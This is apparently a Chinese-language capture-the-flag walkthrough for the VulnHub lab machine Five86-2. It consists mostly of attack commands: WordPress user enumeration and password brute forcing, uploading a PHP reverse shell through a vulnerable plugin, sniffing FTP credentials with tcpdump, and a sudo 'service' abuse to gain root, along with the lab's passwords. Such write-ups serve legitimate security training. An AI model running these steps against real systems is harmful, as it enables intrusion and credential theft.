环境
虚拟机平台:Oracle VM VirtualBox
攻击机:Kali(IP:192.168.56.102)
靶机:Five86-2(IP:192.168.56.114)
下载:https://www.vulnhub.com/entry/five86-2,418/
Let’s go
nmap -A 192.168.56.114
网站使用的是 WordPress,我们进行查看
部分请求失败,需要添加 hosts
vim /etc/hosts
无可利用漏洞,我们进行枚举用户
wpscan --url http://five86-2 -e u
得到用户名,我们进行暴力破解
wpscan --url http://five86-2 -U user -P ./Assorted/rockyou.txt
使用 barney 用户登陆,发现插件存在漏洞
echo "<html>hello</html>" > index.html
cat Assorted/php-reverse-shell.php > index.php
zip poc.zip index.html index.php
curl http://five86-2/wp-content/uploads/articulate_uploads/poc/index.php
nc -lp 1234
发现 stephen 用户可以切换
su stephen
password:apollo1
ps -aux
抓包嗅探一下
timeout 120 tcpdump -i any -w ftp.cap
tcpdump -r ftp.cap | grep -Ei 'user|pass'
su paul
password:esomepasswford
sudo -l
sudo -u peter service ../../bin/sh
sudo passwd root
su root